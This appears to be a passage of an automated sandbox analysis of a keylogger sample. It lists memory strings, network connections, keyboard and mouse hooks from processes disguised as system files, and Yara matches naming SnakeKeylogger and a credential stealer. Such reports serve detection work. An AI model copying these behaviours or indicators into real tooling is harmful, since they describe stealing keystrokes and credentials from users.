Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Game-Bonus-Rounds-Explained-and-How-They-Work--1024x576.p
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Game-Bonus-Rounds-Explained-and-How-They-Work--150x84.png
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Game-Bonus-Rounds-Explained-and-How-They-Work--300x169.pn
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Game-Bonus-Rounds-Explained-and-How-They-Work--450x253.pn
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048130381.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251887908.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154831486.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Game-Bonus-Rounds-Explained-and-How-They-Work--768x432.pn
Source: explorer.exe, 00000004.00000003.1830427393.0000000000775000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2251758293.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154749279.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2047736202.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Game-Bonus-Rounds-Explained-and-How-They-Work-.png
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/Narrative-Design-in-Games-Interactive-Storytelling-vs.-Li
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/WHICH-HAIR-TRANSPLANT-METHOD-IS-BEST-FOR-YOU-1024x576.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/WHICH-HAIR-TRANSPLANT-METHOD-IS-BEST-FOR-YOU-150x84.png
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/WHICH-HAIR-TRANSPLANT-METHOD-IS-BEST-FOR-YOU-300x169.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/WHICH-HAIR-TRANSPLANT-METHOD-IS-BEST-FOR-YOU-450x253.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/WHICH-HAIR-TRANSPLANT-METHOD-IS-BEST-FOR-YOU-768x432.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830179218.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830378310.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-content/uploads/2025/02/WHICH-HAIR-TRANSPLANT-METHOD-IS-BEST-FOR-YOU.png
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830261267.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-includes/css/dist/block-library/style.min.css?ver=5.9.1
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-includes/wlwmanifest.xml
Source: explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-json/
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fzxq.net%2Fwhat-happened-to-the-old-zxq-we
Source: explorer.exe, 00000004.00000003.1938459691.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/wp-json/wp/v2/pages/187
Source: cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/write-for-us/
Source: explorer.exe, 00000004.00000003.1938720048.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048563845.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830809608.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2154682983.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2048718270.0000000003B87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2252179498.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1830752309.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.dr	String found in binary or memory: https://zxq.net/xmlrpc.php?rsd

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 53864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 53627 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53920
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53765
Source: unknown	Network traffic detected: HTTP traffic on port 53579 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 53928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53579
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53898
Source: unknown	Network traffic detected: HTTP traffic on port 53920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53627
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 53587 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53587
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53864
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53679
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53831
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53916 -> 443

Source: unknown	HTTPS traffic detected: 51.81.194.202:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49783 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Windows user hook set: 7300 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Windows user hook set: 7352 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\System\explorer.exe	Windows user hook set: 7416 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\System\explorer.exe	Windows user hook set: 0 keyboard low level c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\System\explorer.exe	Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Windows user hook set: 7460 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL	Jump to behavior
Source: C:\Windows\System\svchost.exe	Windows user hook set: 7492 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\spoolsv.exe	Windows user hook set: 7516 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Windows user hook set: 8124 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Windows user hook set: 7212 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\explorer.exe	Windows user hook set: 7600 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\explorer.exe	Windows user hook set: 7864 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL

Source: C:\Windows\System\explorer.exe

Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
